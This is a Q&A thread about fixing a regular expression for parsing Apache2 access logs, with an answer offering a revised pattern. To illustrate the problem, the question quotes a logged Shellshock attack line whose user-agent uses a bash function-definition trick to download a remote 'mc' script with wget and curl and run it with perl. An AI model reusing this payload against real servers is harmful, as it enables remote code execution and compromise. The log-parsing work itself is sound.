Charlie
Charlie

Reputation: 138

Regexp to parse apache2 log, handle SHELLSHOCK bash hack

I want to parse Apache2 log files and found an otherwise good regexp here to do so, using the regexp below:

/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/

The problem is this regexp predates shellshock hack bots, and the string returns no match against a user agent string like sent below:

Bad example bash attack:

199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""

Here is a regular log line:

157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

Can someone provide an updated regexp that handles hacked user agent string, or suggest an alternative two step php - regexp to be more hack proof? I can see the specific problem relates to handling \" and it appears the last regep can be replaced with "(.*)"$ but I'd like an expert opinion ... Thanks.

Upvotes: 0

Views: 499

Answers (1)

rici
rici

Reputation: 241911

Change both instances of

"([^"]*)"

to

"((?:[^"]|\\")*)"

That will allow \" within quoted strings.

By the way, it is not necessary to backslash-escape quotes in a regex, nor is it necessary to backslash-escape ] in a character class when it is the first character in the class. So you could remove some redundant backslashes. And personally, I'd use the same quote exclusion syntax instead of a non-greedy match.

Finally, as is observed in a comment, the parse of the request will fail in the case that the request is incomplete. If the only incomplete request line is a missing indicator ("-"), then you could recognize these by making most of the request optional, leaving the - as the "method".

So I'd suggest the following:

/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] "(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) "((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$/

Upvotes: 0

Related Questions